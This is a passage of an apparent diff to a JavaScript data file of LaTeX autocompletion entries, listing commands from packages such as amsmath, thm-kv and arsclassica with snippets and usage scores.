'\\empty', + snippet: '\\empty', + meta: 'thm-listof-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'thm-listof-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'thm-listof-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\proof{}', + snippet: '\\proof{$1}', + meta: 'thm-listof-cmd', + score: 0.000701497773639073, + }, + { + caption: '\\proof', + snippet: '\\proof', + meta: 'thm-listof-cmd', + score: 0.000701497773639073, + }, + { + caption: '\\newtheorem{}[]{}', + snippet: '\\newtheorem{$1}[$2]{$3}', + meta: 'thm-listof-cmd', + score: 0.215689795055434, + }, + { + caption: '\\newtheorem{}{}', + snippet: '\\newtheorem{$1}{$2}', + meta: 'thm-listof-cmd', + score: 0.215689795055434, + }, + { + caption: '\\newtheorem{}{}[]', + snippet: '\\newtheorem{$1}{$2}[$3]', + meta: 'thm-listof-cmd', + score: 0.215689795055434, + }, + { + caption: '\\endproof', + snippet: '\\endproof', + meta: 'thm-listof-cmd', + score: 0.0006133100544751855, + }, + { + caption: '\\endproof{}', + snippet: '\\endproof{$1}', + meta: 'thm-listof-cmd', + score: 0.0006133100544751855, + }, + ], + 'thm-autoref': [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'thm-autoref-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\proof{}', + snippet: '\\proof{$1}', + meta: 'thm-autoref-cmd', + score: 0.000701497773639073, + }, + { + caption: '\\proof', + snippet: '\\proof', + meta: 'thm-autoref-cmd', + score: 0.000701497773639073, + }, + { + caption: '\\newtheorem{}[]{}', + snippet: '\\newtheorem{$1}[$2]{$3}', + meta: 'thm-autoref-cmd', + score: 0.215689795055434, + }, + { + caption: '\\newtheorem{}{}', + snippet: '\\newtheorem{$1}{$2}', + meta: 'thm-autoref-cmd', + score: 0.215689795055434, + }, + { + caption: '\\newtheorem{}{}[]', + snippet: '\\newtheorem{$1}{$2}[$3]', + meta: 'thm-autoref-cmd', + score: 0.215689795055434, + }, + { + caption: '\\endproof', + snippet: '\\endproof', + meta: 'thm-autoref-cmd', + score: 0.0006133100544751855, + }, + { + caption: '\\endproof{}', + snippet: '\\endproof{$1}', + meta: 'thm-autoref-cmd', + score: 0.0006133100544751855, + }, + ], + 'thm-patch': [ + { + caption: '\\proof{}', + snippet: '\\proof{$1}', + meta: 'thm-patch-cmd', + score: 0.000701497773639073, + }, + { + caption: '\\proof', + snippet: '\\proof', + meta: 'thm-patch-cmd', + score: 0.000701497773639073, + }, + { + caption: '\\newtheorem{}[]{}', + snippet: '\\newtheorem{$1}[$2]{$3}', + meta: 'thm-patch-cmd', + score: 0.215689795055434, + }, + { + caption: '\\newtheorem{}{}', + snippet: '\\newtheorem{$1}{$2}', + meta: 'thm-patch-cmd', + score: 0.215689795055434, + }, + { + caption: '\\newtheorem{}{}[]', + snippet: '\\newtheorem{$1}{$2}[$3]', + meta: 'thm-patch-cmd', + score: 0.215689795055434, + }, + { + caption: '\\endproof', + snippet: '\\endproof', + meta: 'thm-patch-cmd', + score: 0.0006133100544751855, + }, + { + caption: '\\endproof{}', + snippet: '\\endproof{$1}', + meta: 'thm-patch-cmd', + score: 0.0006133100544751855, + }, + ], + 'thm-kv': [ + { + caption: '\\declaretheoremstyle[]{}', + snippet: '\\declaretheoremstyle[$1]{$2}', + meta: 'thm-kv-cmd', + score: 0.0001168034231635369, + }, + { + caption: '\\declaretheorem[]{}', + snippet: '\\declaretheorem[$1]{$2}', + meta: 'thm-kv-cmd', + score: 0.0004904790216915127, + }, + { + caption: '\\theoremstyle{}', + snippet: '\\theoremstyle{$1}', + meta: 'thm-kv-cmd', + score: 0.02533412165007986, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'thm-kv-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\proof{}', + snippet: '\\proof{$1}', + meta: 'thm-kv-cmd', + score: 0.000701497773639073, + }, + { + caption: '\\proof', + snippet: '\\proof', + meta: 'thm-kv-cmd', + score: 0.000701497773639073, + }, + { + caption: '\\newtheorem{}[]{}', + snippet: '\\newtheorem{$1}[$2]{$3}', + meta: 'thm-kv-cmd', + score: 0.215689795055434, + }, + { + caption: '\\newtheorem{}{}', + snippet: '\\newtheorem{$1}{$2}', + meta: 'thm-kv-cmd', + score: 0.215689795055434, + }, + { + caption: '\\newtheorem{}{}[]', + snippet: '\\newtheorem{$1}{$2}[$3]', + meta: 'thm-kv-cmd', + score: 0.215689795055434, + }, + { + caption: '\\endproof', + snippet: '\\endproof', + meta: 'thm-kv-cmd', + score: 0.0006133100544751855, + }, + { + caption: '\\endproof{}', + snippet: '\\endproof{$1}', + meta: 'thm-kv-cmd', + score: 0.0006133100544751855, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'thm-kv-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'thm-kv-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'thm-kv-cmd', + score: 0.008565354665444157, + }, + ], + onlyamsmath: [ + { + caption: '\\pmb{}', + snippet: '\\pmb{$1}', + meta: 'onlyamsmath-cmd', + score: 0.019171182556792562, + }, + { + caption: '\\boldsymbol{}', + snippet: '\\boldsymbol{$1}', + meta: 'onlyamsmath-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\boldsymbol', + snippet: '\\boldsymbol', + meta: 'onlyamsmath-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\longmapsto', + snippet: '\\longmapsto', + meta: 'onlyamsmath-cmd', + score: 0.0017755897148012264, + }, + { + caption: '\\Check{}', + snippet: '\\Check{$1}', + meta: 'onlyamsmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'onlyamsmath-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'onlyamsmath-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\iff', + snippet: '\\iff', + meta: 'onlyamsmath-cmd', + score: 0.004209937150980285, + }, + { + caption: '\\And', + snippet: '\\And', + meta: 'onlyamsmath-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\And{}', + snippet: '\\And{$1}', + meta: 'onlyamsmath-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\oint', + snippet: '\\oint', + meta: 'onlyamsmath-cmd', + score: 0.0028650540724050534, + }, + { + caption: '\\boxed{}', + snippet: '\\boxed{$1}', + meta: 'onlyamsmath-cmd', + score: 0.0035536135737312827, + }, + { + caption: '\\Ddot{}', + snippet: '\\Ddot{$1}', + meta: 'onlyamsmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ignorespacesafterend', + snippet: '\\ignorespacesafterend', + meta: 'onlyamsmath-cmd', + score: 0.0010893680553454854, + }, + { + caption: '\\nonumber', + snippet: '\\nonumber', + meta: 'onlyamsmath-cmd', + score: 0.051980653969641216, + }, + { + caption: '\\Breve{}', + snippet: '\\Breve{$1}', + meta: 'onlyamsmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\mapsto', + snippet: '\\mapsto', + meta: 'onlyamsmath-cmd', + score: 0.006473769486518971, + }, + { + caption: '\\over{}', + snippet: '\\over{$1}', + meta: 'onlyamsmath-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\over', + snippet: '\\over', + meta: 'onlyamsmath-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\bigotimes', + snippet: '\\bigotimes', + meta: 'onlyamsmath-cmd', + score: 0.000984722260624791, + }, + { + caption: '\\bigoplus', + snippet: '\\bigoplus', + meta: 'onlyamsmath-cmd', + score: 0.0011508785476242003, + }, + { + caption: '\\theequation', + snippet: '\\theequation', + meta: 'onlyamsmath-cmd', + score: 0.002995924112493351, + }, + { + caption: '\\bigcap', + snippet: '\\bigcap', + meta: 'onlyamsmath-cmd', + score: 0.005709261168797874, + }, + { + caption: '\\xrightarrow{}', + snippet: '\\xrightarrow{$1}', + meta: 'onlyamsmath-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\xrightarrow[]{}', + snippet: '\\xrightarrow[$1]{$2}', + meta: 'onlyamsmath-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\atop', + snippet: '\\atop', + meta: 'onlyamsmath-cmd', + score: 0.0006518541515279979, + }, + { + caption: '\\dfrac{}{}', + snippet: '\\dfrac{$1}{$2}', + meta: 'onlyamsmath-cmd', + score: 0.05397545277891961, + }, + { + caption: '\\pmod', + snippet: '\\pmod', + meta: 'onlyamsmath-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\pmod{}', + snippet: '\\pmod{$1}', + meta: 'onlyamsmath-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\notag', + snippet: '\\notag', + meta: 'onlyamsmath-cmd', + score: 0.00322520920930312, + }, + { + caption: '\\int', + snippet: '\\int', + meta: 'onlyamsmath-cmd', + score: 0.11946660537765894, + }, + { + caption: '\\Vec{}', + snippet: '\\Vec{$1}', + meta: 'onlyamsmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\bigvee', + snippet: '\\bigvee', + meta: 'onlyamsmath-cmd', + score: 0.0011677288242806726, + }, + { + caption: '\\sum', + snippet: '\\sum', + meta: 'onlyamsmath-cmd', + score: 0.42607994509619934, + }, + { + caption: '\\hookrightarrow', + snippet: '\\hookrightarrow', + meta: 'onlyamsmath-cmd', + score: 0.0015607282046545064, + }, + { + caption: '\\bigsqcup', + snippet: '\\bigsqcup', + meta: 'onlyamsmath-cmd', + score: 0.0003468284144579442, + }, + { + caption: '\\hookleftarrow', + snippet: '\\hookleftarrow', + meta: 'onlyamsmath-cmd', + score: 0.0016498799924012809, + }, + { + caption: '\\Dot{}', + snippet: '\\Dot{$1}', + meta: 'onlyamsmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\dots', + snippet: '\\dots', + meta: 'onlyamsmath-cmd', + score: 0.0847414497955395, + }, + { + caption: '\\genfrac{}{}{}{}{}{}', + snippet: '\\genfrac{$1}{$2}{$3}{$4}{$5}{$6}', + meta: 'onlyamsmath-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\genfrac', + snippet: '\\genfrac', + meta: 'onlyamsmath-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\cfrac{}{}', + snippet: '\\cfrac{$1}{$2}', + meta: 'onlyamsmath-cmd', + score: 0.006765684097139381, + }, + { + caption: '\\Acute{}', + snippet: '\\Acute{$1}', + meta: 'onlyamsmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ldots', + snippet: '\\ldots', + meta: 'onlyamsmath-cmd', + score: 0.11585556755884258, + }, + { + caption: '\\coprod', + snippet: '\\coprod', + meta: 'onlyamsmath-cmd', + score: 0.00011383372700282614, + }, + { + caption: '\\impliedby', + snippet: '\\impliedby', + meta: 'onlyamsmath-cmd', + score: 2.3482915591834053e-5, + }, + { + caption: '\\big', + snippet: '\\big', + meta: 'onlyamsmath-cmd', + score: 0.05613164277964739, + }, + { + caption: '\\idotsint', + snippet: '\\idotsint', + meta: 'onlyamsmath-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\Longrightarrow', + snippet: '\\Longrightarrow', + meta: 'onlyamsmath-cmd', + score: 0.002459139437356601, + }, + { + caption: '\\allowdisplaybreaks', + snippet: '\\allowdisplaybreaks', + meta: 'onlyamsmath-cmd', + score: 0.005931777024772073, + }, + { + caption: '\\eqref{}', + snippet: '\\eqref{$1}', + meta: 'onlyamsmath-cmd', + score: 0.06345266254167037, + }, + { + caption: '\\mod', + snippet: '\\mod', + meta: 'onlyamsmath-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\mod{}', + snippet: '\\mod{$1}', + meta: 'onlyamsmath-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'onlyamsmath-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: '\\arraystretch{$1}', + meta: 'onlyamsmath-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\bigg', + snippet: '\\bigg', + meta: 'onlyamsmath-cmd', + score: 0.04318078602869565, + }, + { + caption: '\\underset{}{}', + snippet: '\\underset{$1}{$2}', + meta: 'onlyamsmath-cmd', + score: 0.012799893214578391, + }, + { + caption: '\\dotsc', + snippet: '\\dotsc', + meta: 'onlyamsmath-cmd', + score: 0.0008555101484119994, + }, + { + caption: '\\doteq', + snippet: '\\doteq', + meta: 'onlyamsmath-cmd', + score: 3.164631070474435e-5, + }, + { + caption: '\\leftroot{}', + snippet: '\\leftroot{$1}', + meta: 'onlyamsmath-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\substack{}', + snippet: '\\substack{$1}', + meta: 'onlyamsmath-cmd', + score: 0.0037482529712850755, + }, + { + caption: '\\Hat{}', + snippet: '\\Hat{$1}', + meta: 'onlyamsmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\frac{}{}', + snippet: '\\frac{$1}{$2}', + meta: 'onlyamsmath-cmd', + score: 1.4341091141105058, + }, + { + caption: '\\mspace{}', + snippet: '\\mspace{$1}', + meta: 'onlyamsmath-cmd', + score: 3.423236656565836e-5, + }, + { + caption: '\\Bar{}', + snippet: '\\Bar{$1}', + meta: 'onlyamsmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\Grave{}', + snippet: '\\Grave{$1}', + meta: 'onlyamsmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\implies', + snippet: '\\implies', + meta: 'onlyamsmath-cmd', + score: 0.021828316911576096, + }, + { + caption: '\\tbinom', + snippet: '\\tbinom', + meta: 'onlyamsmath-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\dotsi', + snippet: '\\dotsi', + meta: 'onlyamsmath-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\bigwedge', + snippet: '\\bigwedge', + meta: 'onlyamsmath-cmd', + score: 0.000347742918592393, + }, + { + caption: '\\sideset{}{}', + snippet: '\\sideset{$1}{$2}', + meta: 'onlyamsmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\smash{}', + snippet: '\\smash{$1}', + meta: 'onlyamsmath-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\smash[]{}', + snippet: '\\smash[$1]{$2}', + meta: 'onlyamsmath-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\colon', + snippet: '\\colon', + meta: 'onlyamsmath-cmd', + score: 0.005300291684408929, + }, + { + caption: '\\intertext{}', + snippet: '\\intertext{$1}', + meta: 'onlyamsmath-cmd', + score: 0.0016148076375871775, + }, + { + caption: '\\Longleftarrow', + snippet: '\\Longleftarrow', + meta: 'onlyamsmath-cmd', + score: 8.477207854183949e-5, + }, + { + caption: '\\prod', + snippet: '\\prod', + meta: 'onlyamsmath-cmd', + score: 0.02549889375975901, + }, + { + caption: '\\AmS', + snippet: '\\AmS', + meta: 'onlyamsmath-cmd', + score: 0.00047859486202980376, + }, + { + caption: '\\overline{}', + snippet: '\\overline{$1}', + meta: 'onlyamsmath-cmd', + score: 0.11280487530505384, + }, + { + caption: '\\tfrac{}{}', + snippet: '\\tfrac{$1}{$2}', + meta: 'onlyamsmath-cmd', + score: 0.0005923542426657187, + }, + { + caption: '\\uproot{}', + snippet: '\\uproot{$1}', + meta: 'onlyamsmath-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\bmod', + snippet: '\\bmod', + meta: 'onlyamsmath-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\bmod{}', + snippet: '\\bmod{$1}', + meta: 'onlyamsmath-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\pod{}', + snippet: '\\pod{$1}', + meta: 'onlyamsmath-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'onlyamsmath-cmd', + score: 1.897791904799601, + }, + { + caption: '\\longrightarrow', + snippet: '\\longrightarrow', + meta: 'onlyamsmath-cmd', + score: 0.013399422292458848, + }, + { + caption: '\\xleftarrow[]{}', + snippet: '\\xleftarrow[$1]{$2}', + meta: 'onlyamsmath-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\xleftarrow{}', + snippet: '\\xleftarrow{$1}', + meta: 'onlyamsmath-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\mathaccentV', + snippet: '\\mathaccentV', + meta: 'onlyamsmath-cmd', + score: 6.216218551413489e-5, + }, + { + caption: '\\hdotsfor{}', + snippet: '\\hdotsfor{$1}', + meta: 'onlyamsmath-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\hdotsfor[]{}', + snippet: '\\hdotsfor[$1]{$2}', + meta: 'onlyamsmath-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\Bigg', + snippet: '\\Bigg', + meta: 'onlyamsmath-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\Bigg[]', + snippet: '\\Bigg[$1]', + meta: 'onlyamsmath-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\overset{}{}', + snippet: '\\overset{$1}{$2}', + meta: 'onlyamsmath-cmd', + score: 0.007611544955294224, + }, + { + caption: '\\Big', + snippet: '\\Big', + meta: 'onlyamsmath-cmd', + score: 0.050370758781422345, + }, + { + caption: '\\longleftrightarrow', + snippet: '\\longleftrightarrow', + meta: 'onlyamsmath-cmd', + score: 0.0002851769278703356, + }, + { + caption: '\\Longleftrightarrow', + snippet: '\\Longleftrightarrow', + meta: 'onlyamsmath-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\Longleftrightarrow{}', + snippet: '\\Longleftrightarrow{$1}', + meta: 'onlyamsmath-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\binom{}{}', + snippet: '\\binom{$1}{$2}', + meta: 'onlyamsmath-cmd', + score: 0.013010882180364367, + }, + { + caption: '\\longleftarrow', + snippet: '\\longleftarrow', + meta: 'onlyamsmath-cmd', + score: 0.0011096532692473691, + }, + { + caption: '\\dbinom{}{}', + snippet: '\\dbinom{$1}{$2}', + meta: 'onlyamsmath-cmd', + score: 0.006800272303210672, + }, + { + caption: '\\Tilde{}', + snippet: '\\Tilde{$1}', + meta: 'onlyamsmath-cmd', + score: 7.874446783586035e-5, + }, + { + caption: '\\bigcup', + snippet: '\\bigcup', + meta: 'onlyamsmath-cmd', + score: 0.0058847868741168765, + }, + { + caption: '\\sinh', + snippet: '\\sinh', + meta: 'onlyamsmath-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\sinh{}', + snippet: '\\sinh{$1}', + meta: 'onlyamsmath-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\operatorname{}', + snippet: '\\operatorname{$1}', + meta: 'onlyamsmath-cmd', + score: 0.02181954887028883, + }, + { + caption: '\\max', + snippet: '\\max', + meta: 'onlyamsmath-cmd', + score: 0.04116833357968482, + }, + { + caption: '\\liminf', + snippet: '\\liminf', + meta: 'onlyamsmath-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\liminf{}', + snippet: '\\liminf{$1}', + meta: 'onlyamsmath-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\operatornamewithlimits{}', + snippet: '\\operatornamewithlimits{$1}', + meta: 'onlyamsmath-cmd', + score: 0.0022415507993352067, + }, + { + caption: '\\exp', + snippet: '\\exp', + meta: 'onlyamsmath-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\exp{}', + snippet: '\\exp{$1}', + meta: 'onlyamsmath-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\lim', + snippet: '\\lim', + meta: 'onlyamsmath-cmd', + score: 0.05285123457928509, + }, + { + caption: '\\sin', + snippet: '\\sin', + meta: 'onlyamsmath-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\sin{}', + snippet: '\\sin{$1}', + meta: 'onlyamsmath-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\arg', + snippet: '\\arg', + meta: 'onlyamsmath-cmd', + score: 0.007190995792600074, + }, + { + caption: '\\cos', + snippet: '\\cos', + meta: 'onlyamsmath-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\cos{}', + snippet: '\\cos{$1}', + meta: 'onlyamsmath-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\varliminf', + snippet: '\\varliminf', + meta: 'onlyamsmath-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\hom', + snippet: '\\hom', + meta: 'onlyamsmath-cmd', + score: 8.180643329881783e-5, + }, + { + caption: '\\tan', + snippet: '\\tan', + meta: 'onlyamsmath-cmd', + score: 0.006176447465423192, + }, + { + caption: '\\det', + snippet: '\\det', + meta: 'onlyamsmath-cmd', + score: 0.005640718203101287, + }, + { + caption: '\\ln', + snippet: '\\ln', + meta: 'onlyamsmath-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\ln{}', + snippet: '\\ln{$1}', + meta: 'onlyamsmath-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\cosh', + snippet: '\\cosh', + meta: 'onlyamsmath-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\cosh{}', + snippet: '\\cosh{$1}', + meta: 'onlyamsmath-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\gcd', + snippet: '\\gcd', + meta: 'onlyamsmath-cmd', + score: 0.002254008371792865, + }, + { + caption: '\\limsup', + snippet: '\\limsup', + meta: 'onlyamsmath-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\limsup{}', + snippet: '\\limsup{$1}', + meta: 'onlyamsmath-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\inf', + snippet: '\\inf', + meta: 'onlyamsmath-cmd', + score: 0.00340470256994063, + }, + { + caption: '\\arccos', + snippet: '\\arccos', + meta: 'onlyamsmath-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\arccos{}', + snippet: '\\arccos{$1}', + meta: 'onlyamsmath-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\ker', + snippet: '\\ker', + meta: 'onlyamsmath-cmd', + score: 0.002475379242338094, + }, + { + caption: '\\cot', + snippet: '\\cot', + meta: 'onlyamsmath-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\cot{}', + snippet: '\\cot{$1}', + meta: 'onlyamsmath-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\coth{}', + snippet: '\\coth{$1}', + meta: 'onlyamsmath-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\coth', + snippet: '\\coth', + meta: 'onlyamsmath-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\varlimsup', + snippet: '\\varlimsup', + meta: 'onlyamsmath-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\log', + snippet: '\\log', + meta: 'onlyamsmath-cmd', + score: 0.048131780413380156, + }, + { + caption: '\\varinjlim', + snippet: '\\varinjlim', + meta: 'onlyamsmath-cmd', + score: 0.000361814283649031, + }, + { + caption: '\\deg', + snippet: '\\deg', + meta: 'onlyamsmath-cmd', + score: 0.005542465148816408, + }, + { + caption: '\\arctan', + snippet: '\\arctan', + meta: 'onlyamsmath-cmd', + score: 0.0011971697553682045, + }, + { + caption: '\\dim', + snippet: '\\dim', + meta: 'onlyamsmath-cmd', + score: 0.0038210003967178293, + }, + { + caption: '\\min', + snippet: '\\min', + meta: 'onlyamsmath-cmd', + score: 0.03051120054363316, + }, + { + caption: '\\Pr', + snippet: '\\Pr', + meta: 'onlyamsmath-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\Pr[]', + snippet: '\\Pr[$1]', + meta: 'onlyamsmath-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\tanh', + snippet: '\\tanh', + meta: 'onlyamsmath-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\tanh{}', + snippet: '\\tanh{$1}', + meta: 'onlyamsmath-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\arcsin', + snippet: '\\arcsin', + meta: 'onlyamsmath-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\arcsin{}', + snippet: '\\arcsin{$1}', + meta: 'onlyamsmath-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\DeclareMathOperator{}{}', + snippet: '\\DeclareMathOperator{$1}{$2}', + meta: 'onlyamsmath-cmd', + score: 0.029440493885398676, + }, + { + caption: '\\csc', + snippet: '\\csc', + meta: 'onlyamsmath-cmd', + score: 0.00013963711107573638, + }, + { + caption: '\\sup', + snippet: '\\sup', + meta: 'onlyamsmath-cmd', + score: 0.009355514755312534, + }, + { + caption: '\\sec', + snippet: '\\sec', + meta: 'onlyamsmath-cmd', + score: 0.0005912636157903734, + }, + { + caption: '\\varprojlim', + snippet: '\\varprojlim', + meta: 'onlyamsmath-cmd', + score: 0.0004286136584068833, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'onlyamsmath-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'onlyamsmath-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'onlyamsmath-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'onlyamsmath-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'onlyamsmath-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'onlyamsmath-cmd', + score: 0.0063276692758974925, + }, + ], + arsclassica: [ + { + caption: '\\spacedlowsmallcaps{}', + snippet: '\\spacedlowsmallcaps{$1}', + meta: 'arsclassica-cmd', + score: 0.002677188251799468, + }, + { + caption: '\\sectionmark', + snippet: '\\sectionmark', + meta: 'arsclassica-cmd', + score: 0.005008938879210868, + }, + { + caption: '\\spacedallcaps{}', + snippet: '\\spacedallcaps{$1}', + meta: 'arsclassica-cmd', + score: 0.0015281000475958944, + }, + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'arsclassica-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\clearpage', + snippet: '\\clearpage', + meta: 'arsclassica-cmd', + score: 0.1789117552185788, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'arsclassica-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\specialrule{}{}{}', + snippet: '\\specialrule{$1}{$2}{$3}', + meta: 'arsclassica-cmd', + score: 0.004974385202605165, + }, + { + caption: '\\cmidrule', + snippet: '\\cmidrule', + meta: 'arsclassica-cmd', + score: 0.01894952272365088, + }, + { + caption: '\\cmidrule{}', + snippet: '\\cmidrule{$1}', + meta: 'arsclassica-cmd', + score: 0.01894952272365088, + }, + { + caption: '\\bottomrule', + snippet: '\\bottomrule', + meta: 'arsclassica-cmd', + score: 0.04533364657852219, + }, + { + caption: '\\midrule', + snippet: '\\midrule', + meta: 'arsclassica-cmd', + score: 0.07098077735912875, + }, + { + caption: '\\addlinespace', + snippet: '\\addlinespace', + meta: 'arsclassica-cmd', + score: 0.005865460617491447, + }, + { + caption: '\\addlinespace[]', + snippet: '\\addlinespace[$1]', + meta: 'arsclassica-cmd', + score: 0.005865460617491447, + }, + { + caption: '\\toprule', + snippet: '\\toprule', + meta: 'arsclassica-cmd', + score: 0.059857788139528495, + }, + { + caption: '\\captionsetup{}', + snippet: '\\captionsetup{$1}', + meta: 'arsclassica-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\captionsetup[]{}', + snippet: '\\captionsetup[$1]{$2}', + meta: 'arsclassica-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\captionof{}{}', + snippet: '\\captionof{$1}{$2}', + meta: 'arsclassica-cmd', + score: 0.018348594199161503, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'arsclassica-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\appendix', + snippet: '\\appendix', + meta: 'arsclassica-cmd', + score: 0.047007158741781095, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'arsclassica-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'arsclassica-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\chapter{}', + snippet: '\\chapter{$1}', + meta: 'arsclassica-cmd', + score: 0.422097569591803, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'arsclassica-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\hspace{}', + snippet: '\\hspace{$1}', + meta: 'arsclassica-cmd', + score: 0.3147206476372336, + }, + { + caption: '\\caption{}', + snippet: '\\caption{$1}', + meta: 'arsclassica-cmd', + score: 1.2569477427490174, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'arsclassica-cmd', + score: 1.897791904799601, + }, + { + caption: '\\ContinuedFloat', + snippet: '\\ContinuedFloat', + meta: 'arsclassica-cmd', + score: 5.806935368083486e-5, + }, + { + caption: '\\noindent', + snippet: '\\noindent', + meta: 'arsclassica-cmd', + score: 0.42355747798114207, + }, + { + caption: '\\titleclass{}{}[]', + snippet: '\\titleclass{$1}{$2}[$3]', + meta: 'arsclassica-cmd', + score: 0.00028979763314974667, + }, + { + caption: '\\titlelabel{}', + snippet: '\\titlelabel{$1}', + meta: 'arsclassica-cmd', + score: 6.40387839367932e-6, + }, + { + caption: '\\thetitle', + snippet: '\\thetitle', + meta: 'arsclassica-cmd', + score: 0.0015531478302713473, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'arsclassica-cmd', + score: 0.021170869458413965, + }, + { + caption: 